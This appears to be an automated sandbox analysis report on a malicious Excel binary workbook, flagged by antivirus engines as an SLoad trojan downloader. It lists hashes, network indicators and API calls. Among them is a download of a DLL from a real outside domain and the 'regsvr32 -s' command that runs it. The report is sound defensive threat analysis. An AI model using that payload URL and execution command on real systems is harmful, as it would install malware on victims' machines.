Summary | ZeroBOX

information_01913.xlsb

Category Machine Started Completed
FILE s1_win7_x6402 July 12, 2021, 9:39 a.m. July 12, 2021, 9:41 a.m.
Size 208.9KB
Type Zip archive data, at least v2.0 to extract
MD5 876840f5faa0b20d0713a7e8435b19b7
SHA256 51f6f63c2293245754b1da774b6da07f532460a6385379901339b91535c22770
CRC32 15607CD0
ssdeep 3072:GPLcNfKSwCj4DzTB4uN5+8eV6hwIVFvnQCa5wrNvNppmWDzVXImozZHMXe+8ftJY:dd73uNs7DIrPZPNflV+sOdftJ6Twgd
Yara None matched

Name Response Post-Analysis Lookup
free.mynowministries.com 162.241.253.78
IP Address Status Action
162.241.253.78 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2428
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b6e3000
process_handle: 0xffffffff
1 0 0
file C:\Users\Public\Documents\decrypt.dll
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x000003cc
filepath: C:\Users\test22\AppData\Local\Temp\~$information_01913.xlsb
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$information_01913.xlsb
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
cmdline regsvr32 -s C:\Users\Public\Documents\decrypt.dll
Alibaba TrojanDownloader:Office/SLoad.7e7be6dd
Kaspersky HEUR:Trojan-Downloader.MSOffice.SLoad.gen
McAfee-GW-Edition Artemis!Trojan
Fortinet MSExcel/Agent.DB77!tr.dldr
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: https://free.mynowministries.com/app.dll
stack_pivoted: 0
filepath_r: C:\Users\Public\Documents\decrypt.dll
filepath: C:\Users\Public\Documents\decrypt.dll
2148270085 0
parent_process excel.exe martian_process regsvr32 -s C:\Users\Public\Documents\decrypt.dll